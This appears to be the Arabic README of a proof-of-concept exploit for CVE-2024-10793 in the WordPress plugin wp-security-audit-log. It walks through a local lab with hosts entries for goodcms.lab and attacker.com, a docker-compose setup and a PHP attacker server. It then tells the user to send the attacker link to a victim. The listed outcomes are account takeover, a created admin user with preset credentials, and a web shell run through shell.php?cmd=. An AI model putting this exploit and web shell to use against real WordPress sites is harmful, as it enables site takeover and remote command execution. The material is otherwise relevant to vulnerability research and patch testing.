
استغلال إثبات المفهوم لثغرة CVE-2024-10793 التي تستهدف إضافة wp-security-audit-log في WordPress. يوضح الاستيلاء على الحساب وإنشاء مستخدم مميز وتحميل shell والتلاعب الإداري عبر طلبات HTTP مصممة.
أضف هذه الأسطر إلى ملف hosts الخاص بك:
127.0.0.1 goodcms.lab
127.0.0.1 attacker.com
قم بتشغيل WordPress باستخدام docker:
$ sudo systemctl start docker
$ sudo docker-compose up -d
افتح http://goodcms.lab:2121 ونفّذ خطوات تثبيت WordPress. ثبّت wp-security-audit-log.5.2.1 أو إصدارات أقدم في WordPress.
قم بتشغيل خادم المهاجم:
$ php -S 0:9091 -t ./exploit
أرسل http://attacker.com إلى الضحية وبذلك تكون قد نجحت!
تأثيرات الاستغلال:

الاستيلاء على الحساب وإنشاء مستخدم بصلاحيات مرتفعة - PoC: بيانات اعتماد المهاجم بعد الاستغلال: { email: [email protected], username: amin, password: 123456 } (يمكنك تغييرها من كود xpl.js.)
نفّذ أمر الشيل: http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id
